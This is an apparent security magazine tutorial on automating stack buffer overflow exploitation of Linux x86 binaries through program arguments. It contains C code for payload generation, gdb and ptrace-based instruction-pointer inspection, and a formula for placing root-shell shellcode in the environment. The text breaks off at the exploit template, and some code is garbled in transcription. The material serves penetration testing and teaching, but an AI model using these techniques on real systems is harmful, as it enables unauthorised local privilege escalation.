Automating the exploitation process on Linux x86Automating the exploitation process on Linux x86
Stavros Lekkas
Inspection of precompiled binaries for flaws is a very
painful responsibility for penetration testers. A tool which could
identify buffer overflow bugs and produce exploit code would definitely
ease the burden.
Imagine coming across a piece of compiled code without
the luck to possess its source code. What is more, it exhibits the
typical characteristics of having a buffer overflow vulnerability.
Since disassembly analysis is an extremely time-consuming process, a
tool which could automate the process of exploiting this potential
vulnerability would be very useful. Let's have a look at a possible
implementation of such a tool.
Claiming that a program contains a stack based buffer
overflow bug is an indirect implication that there exists a location,
the so called buffer, where data is copied. These buffers exist in
stack and they are pointed to by addresses. What is more, when data get
copied, the bounds are not checked, with the risk of an overflow. After
overflowing a buffer, some other segments out of its scope get
overwritten as well. Effective manipulation of such segments with valid
data leads to control of the execution flow of the program by just
using valid pointing addresses.
The aforementioned data, which get placed into the
buffer, sometimes are of the form of user input. The program can accept
user input in many possible ways such as the program arguments (or
parameters if you like), environmental variables, switches, even
run-time program inputs received using the libc gets(), scanf()
functions etc. Since each one of these ways for supplying data has its
own story, we will focus on the program arguments as our attack vector.
It is very crucial to mention that the automation concept
has nothing to do with fuzzy logic and the product tool is not
affiliated with fuzzing techniques. Trying to locate specific
vulnerabilities by inspecting data generated from deliberate inputs is
not fuzzing (see Inset Fuzzing).
In our quest to find paths to control the %eip (see
Figure 1 for explanation) via arguments, we have to make some reasoning
about what we have to face. For example, given a binary executable, it
is either vulnerable or not. The first assumption can be translated as
either the nth argument is not vulnerable or it is vulnerable, and if
so there is a finite distance which must be filled with characters so
as to reach the %eip.
Tailoring those requirements into predefined ranges of values assists
the creation of a cohesive construction model into a finite framework.
Fuzzing
Fuzzing means acting using Fuzzy Logic. Fuzzy Logic
theory deals with ambiguity and tries to categorise uncertainty and
classify it using mathematics. The set of all integers, in mathematics,
has infinite cardinality, and so does the set of all real numbers, etc.
Though, when it comes to computers, everything is finite and
calculations with really large operands may fail.
Program arguments
Many ELF executables receive arguments before starting
their execution. A typical example is the rm command, where we have to
supply as a parameter what we want to delete. Let's imagine an ELF
executable, a.out, that just prints a stream of characters as supplied
for argument one.
$ ./a.out hakin9
You typed: hakin9
There is a possibility that instead of just calling
printf() with argv[1] as parameter, an intermediate buffer, an array of
characters, has been declared. Thus, argv[1] is copied into the buffer
and printf() uses that buffer as parameter, hopefully with the
appropriate format string. There is also a possibility that argv[1]
gets copied into that buffer in an unsafe manner. What if we just keep
feeding it with larger inputs?
$ ./a.out `perl -e ‘print “A” x 50'`
You typed: AAAAAAA … AAA
Segmentation fault (core dumped)
It crashed and it produced a core. Though, many Linux
distributions do no produce core files so we can enable this by just
typing:
$ ulimit -c unlimited
This way we allow the production of core files that have
unlimited file size. Back to our example, the fact that it produced a
core means that, indeed, an intermediate buffer had been used, into
which argv[1] had been copied unsafely. By using gdb, the GNU debugger,
we can see the instruction that caused the crash.
$ ./gdb -c core ./a.out | grep \#0
#0 0x41414141 in ?? ()
This makes sense because 0x41 is the hexadecimal equivalent of A. Figure 1 gives a more detailed conceptual overview.
Figure 1. Conceptual overview of an unsafe copy operation
The instruction pointer got overwritten with an invalid
address leading to a crash (see also Article Overflowing the stack on
Linux x86 which is available on the hakin9.org website).
Instead of supplying it with fifty A's, we could have
found the exact distance until the end of %ebp, fill that distance with
A's and then supply a valid address. This way we can control the flow
of the executed program in a way that it will execute code we can
supply. What is more, this can be done automatically.
Information gathering
At this point we shall mention that the information that
concerns us about a given executable is the argument number, which
gives us a pathway to manipulate the %eip, and the distance until the %eip.
At the previous example of a.out, we could start the gdb application
for every possible length value of the argument setting every time a
buffer payload which increases incrementally. Then we have to inspect
the value of the instruction pointer and decide the degree that it has
been affected by our inputs. If the executable is indeed vulnerable, we
will see three different states during our examination. The following
three states will occur in sequence:
Note that a successful partial overwriting corresponds
to altering the three out of four bytes of the %eip. The address
0xbfff4141 cannot be assumed as suspect for partial overwrite since it
is a valid stack pointing address. The address 0xbf414141 though, is
much more suspect because it happens really seldom for the stack to
grow that large. Although the final implementation incorporates this
issue, it would not be a bad idea to assign weight constant values to
indicate how much critical and deliberate the potential overwriting can
be.
Payload creation algorithm one
The subsystem that is responsible for creating the
payloads does nothing more than to create buffers filled with A's when
it is asked to do so. A fairly easy to understand policy to produce
such payloads is the famous brute force technique. We will create
buffers of all possible lengths, which will be tested one by one until
an alternation sign has been made or until we reach the maximum buffer
length testing range. If the argument is vulnerable and our test range
is in the same range then the deliberate alternation will be definitely
spotted.
Figure 2. Flowchart of payload creation algorithm one
Figure 2 describes this increase by one algorithm.
Creating incremental buffers when the increment is just one byte has
some advantages and disadvantages. One of the advantages is that it
reduces programming complexity for the sake of computational time. It
actually offers a more abstract implementation. If the increment is
larger than a single A then it would definitely speed up the process
but would introduce conflicts with our three possible %eip states. Recall that an alternation is categorized as deliberate if and only if all four bytes of the %eip
have been altered and three out of four bytes had been altered at the
previous try. Listing 1 is an implementation of the payload creation
subsystem as a fully reusable component.
Listing 1. The payload creation subsystem
char *make_payload(char *buffer, int policy, LINT num)
{
char *my_buffer;
LINT i, len = strlen(buffer);
if( policy == _APPEND ) {
if( !(my_buffer = (char *)malloc( len + num + 1 )) ) {
fprintf(stderr, "[!] make_payload(): malloc() append error.n");
exit(EXIT_FAILURE);
}
CLEAR(my_buffer);
if( len != 0 )
for( i = 0; i < len; i++ )
my_buffer[i] = *(buffer++);
for( i = len; i < len + num; i++ )
my_buffer[i] = 'A';
my_buffer[i] = 0x00;
}
if( policy == _REMOVE ) {
if( !(my_buffer = (char *)malloc( len - num + 1 )) ) {
fprintf(stderr, "[!] make_payload(): malloc() remove error.n");
exit(EXIT_FAILURE);
}
CLEAR(my_buffer);
for( i = 0; i < len - num; i++ )
my_buffer[i] = *(buffer++);
my_buffer[i] = 0x00;
}
return my_buffer;
}
Since the code of Listing 1 uses malloc() to allocate a
buffer and then returns a pointer to it, it should be freed somehow.
This can be done in the following way:
char *p;
p = make_payload(“foo”,
_APPEND, 1);
free(p);
Payload creation algorithm two
Instead of increasing the payload by a single A, it is
as well possible to increase it with blocks of A's. However, it
conflicts with our three possible %eip states and that is why it is not
implemented in the tool. To be more precise, there is a considerable
probability that state 2 will never be met, which conflicts with the
currently defined flow of internal states. When creating buffers from
blocks of A's the most efficient value seems to be three A's per block
in terms of speed. To be more specific, the ideal value is produced by
the formula:
block_len = word_size(
%eip size in bytes) - 1 <=> (1)
block_len = 4 - 1 <=>
block_len = 3
This gives us three possible sets of %eip overwriting
scenarios. One of the most interesting cases happens when %eip is
totally overwritten and the payload length is not well adjusted to the
precise distance. At that point, the payload production subsystem shall
produce decreased payloads. In this case, state 3 gets the occurrence
priority of state 2 and vice versa.
All in all, this method provides speed but includes both
forward and reversed payload generation (see Figure 3). With
appropriate criteria categorization of the %eip alternation, it would
be an ideal method to produce payloads using fixed blocks. Recall that
this algorithm is not adopted in the tool code, thus, if this article
is of interest to you, it is up to you to develop it effectively and
efficiently.
Figure 3. Flowchart of payload creation algorithm two
Inspection algorithm one
The execution-and-inspection subsystem is by far the
most valuable component of this tool because it contains a simple
decision engine. Its role is not as passive as the payload production
subsystem. This subsystem is responsible for executing the vulnerable
application with the constructed payload in the relevant argument and
decides according to the %eip value if the desired outcome has been
revealed. This decision making process is achieved through a list of
prioritized heuristics, which are of the simple form of if-then
statements.
A very fast and dirty way to develop such a component is
by using the gdb, grep and awk command-line tools. A valid command
shall be produced and with the aid of pipes sensitive information will
get extracted. Listing 2 implements this technique.
Listing 2. Execution and inspection subsystem using gdb, grep and awk
int exec_and_inspect_1(char *buffer, int arg, char *vulnfile)
{
char tmp[512], bufresponse[64];
int inspec_val, i;
FILE *fd;
u_long address;
close(2);
if( (fd = fopen(CMDF, "w+")) == NULL ) {
ttyd = open("/dev/tty", O_RDONLY);
fprintf(stderr, "[!] exec_and_inspect_1(): error creating gdb command file.n");
fflush(stderr);
return -2;
}
fprintf(fd, "r ");
for(i = 0; i < arg - 1; i++)
fprintf(fd, "foo ");
fprintf(fd, "%snquitn", buffer);
fclose(fd);
CLEAR(tmp);
snprintf(tmp, 511, "%s %s --command=%s|%s 0x | %s {'print $1'} > %s",
GDB, vulnfile, CMDF, GREP, AWK, RETF);
system(tmp);
unlink(CMDF);
CLEAR(bufresponse);
if( (fd = fopen( RETF, "r")) == NULL ) {
ttyd = open("/dev/tty", O_RDONLY);
fprintf(stderr, "[!] exec_and_inspect_1(): error reading gdb output file.n");
fflush(stderr);
return -2;
}
fgets(bufresponse, 63, fd);
fclose(fd);
address = strtoul(bufresponse, 0, 16);
if(verbose)
fprintf(stdout, "-> Buffer len: %ldn", strlen(buffer));
Continued on next page
Listing 2. Execution and inspection subsystem using gdb, grep and awk (continued)
switch( address_status( address ) ) {
case 0:
if( flag == 1 ) {
if(verbose) {
fprintf(stdout, "-> %%eip status: definately smashed. ");
printfixed(address);
}
inspec_val = 0;
}
else {
if(verbose) {
fprintf(stdout, "-> %%eip status: probably smashed. ");
printfixed(address);
}
inspec_val = -1;
}
break;
case 1:
flag = 1;
if(verbose) {
fprintf(stdout, "-> %%eip status: partially smashed. ");
printfixed(address);
}
inspec_val = -1;
break;
case -1:
if(verbose) {
if(address) {
fprintf(stdout, "-> %%eip status: not smashed. ");
printfixed(address);
}
else
fprintf(stdout, "-> %%eip status: not smashed. (unaccessible)n");
}
inspec_val = -1;
break;
default:
fprintf(stderr, "[!] I shouldn't be here.n");
inspec_val = -2;
}
unlink(RETF);
return inspec_val;
}
The payload and the argument that is about to get tested
are supplied as function parameters (see Listing 2). The general design
principle that the author adopted is to return handling codes back to
the previous layer (caller textual level) which in turn does the same
to its previous one. This tree-like design offers great flexibility.
The advantage of this technique is that it offers very good testing
speed. Though, it is highly linked with third party applications, the
integrity of which is unknown.
Inspection algorithm two
A second potential implementation of an
execution-and-inspection subsystem could be based on the ptrace()
system call. It provides a nice set of low level features, some of
which we are about to adopt. All in all, ptrace enables one process to
control the execution of another. The traced process behaves normally,
until a signal is caught. We will call ptrace() with PTRACE_TRACEME as
the value of the request to enable control over a child process. The
latter process will be created using fork(). PTRACE_GETREGS will be
used to fetch all register values into an appropriate register
structure, aiding us with the %eip inspection. Finally
PTRACE_SINGLESTEP will assist us on finding the malicious instruction.
The implementation corresponds to Listing 3.
Listing 3. Execution and inspection subsystem using the ptrace syscall
int exec_and_inspect_2(char *buffer, int arg, char *vulnfile)
{
REGISTERS regs;
pid_t pid;
int inspec_val = -1, wait_val, i = 1;
LLONG counter = 0;
char *args[MAX_ARGS] = {NULL};
args[0] = "lazyjoe";
for(i = 1; i <= arg - 1; i++)
args[i] = "foo";
args[i] = buffer;
args[i+1] = NULL;
switch( pid = fork() ) {
case -1:
return -2;
break;
case 0:
ptrace(PTRACE_TRACEME, 0, 0, 0);
execv(vulnfile, args);
break;
default:
wait(&wait_val);
if(verbose)
fprintf(stdout, "-> Buffer len: %ldn", strlen(buffer));
while(wait_val == 1407) {
counter++;
counter_tot++;
if( ptrace(PTRACE_GETREGS, pid, 0, ®s) != 0 ) {
fprintf(stderr, "[!] ptrace(): error fetching registers.n");
fflush(stderr);
return -2;
}
if( ptrace(PTRACE_SINGLESTEP, pid, 0, 0) != 0 ) {
fprintf(stderr, "[!] ptrace(): error restarting.n");
fflush(stderr);
return -2;
}
if(verbose) {
fprintf(stdout, "-> eip: %8xr", regs.eip);
fflush(stdout);
}
if( regs.eip == 0x41414141 ) {
if(verbose) {
fprintf(stdout, "-> Number of instructions this round: %ldn", counter);
fprintf(stdout, "-> Total number of instructions: %ldn", counter_tot);
}
inspec_val++;
kill(pid, SIGKILL);
}
wait(&wait_val);
}
}
return inspec_val;
}
Notice that the implementation of Listing 3 does not
respect the three-state sequence of occurence. This is because this
technique does not deal with string manipulation, as the previous one,
but it straightly interacts with register values. Both this and the
previous techniques receive the same information as parameters, and
produce the same error handling codes for a given situation.
This technique is generally very time-consuming and one
should never rely on it for large buffer values. Although it is not
fast enough, if used in verbose mode it is very interesting as it
prints all the instruction values passed by %eip during testing time.
We are talking about millions or more of instructions and therefore
logging them is not encouraged. Those instructions can be used to
identify stack frame patterns aiding a deeper analysis of the
executable.
Cooperation of functional components
If it has not been clear until now, the consistency of
the actions of the tool is highly dependant on correct design-based
cooperation of the subsystems. The two core subsystems communicate with
each other by sending handling codes to their intermediate management
layer, the find_dist() function (see the source code for the
implementation). Their feedback driven cooperation is conceptually
depicted in Figure 4.
Figure 4. Coopeation of functional components
The module numbered as 7 in Figure 4 is responsible for
the identification of the %eip status based on its hardcoded
heuristics. This is how the decision process takes place and therefore
how the precise distance can be found.
The exploit code
Up till now we have seen how to locate the precise
distance via a vulnerable argument. What follows is the exploit
generation subsystem whose concept would be much more easily understood
by going over the theory.
An exploit code is a piece of code crafted for the
purpose that its name suggests: to take advantage of a situation. This
situation is a programming flaw and as far as it concerns the article,
it is a local stack based argument overflow. By exploiting the
programming flaw we can execute commands of our choice. These commands
are the famous shellcode part of the exploit code. It is named
shellcode because, after all, it executes a new shell. They are
presented in machine code format which looks like a hexadecimal
sequence (see Article Linux shellcode optimization which is available
on hakin9.org website). As writing shellcodes is out of the scope of
this article, we will assume a shellcode that spawns a shell, by
issuing the following commands in sequence:
setuid(0);execve ("/bin/sh", 0);exit (0);
Our aim is to pass to the actual vulnerable program some
junk bytes until a desired distance has been reached. This distance is
the start of the instruction pointer (%eip) which will be overwritten
with a valid address that points to our shellcode. This is a very
interesting part. How can we know deterministically the address of
where our shellcode be located exactly? Can we identify a formula that
gives a universally valid pointing address to it? Can we avoid the need
for specific information that is related with our Linux distribution?
An answer to such questions can be found by introducing a generic
exploit code template.
The direct hit method
On our way to establish a generic exploit code template,
we fall onto the stack. The stack is structured in a way that assists
us in finding a universal formula. The stack top varies depending on
our program. Though, the last valid address that points into the
stack-space is fixed and it is 0xbfffffff. Figure 5 depicts the stack
at its bottom.
Figure 5. The Linux stack at its bottom
Data get executed bottom-up while the stack grows in a
top-down manner. The environment is at a fixed distance from the stack
bottom and we can find its nth item with the aid of Figure 5. The
formula for the nth environment item is:
address = 0xbfffffff - 4
- ( strlen(prog_name) + 1 )
- strlen(env[n]); (2)
which equals to:
address = 0xbffffffa
- strlen(prog_name)
- strlen(env[n]); (3)
The environment looks like an ideal place for placing our
shellcode. We can put our shellcode into an environment structure and
execute the vulnerable binary using the previous environment. This can
be done using either the execve() or execle() functions as far as their last parameter is an environment structure. This method does not require any NOP (0x90) opcodes to sled over because it points directly to the shellcode in stack.
Assembling the gathered information
So long, and thanks for all the fish (Douglas Adams, The
hitch hiker's guide to the galaxy, 1984). Having already identified the
distance until the start of %eip and hopefully our formula, we can now
create the exploit code template. An efficient implementation should
look like the one of Listing 4.
Listing 4. A generic exploit code template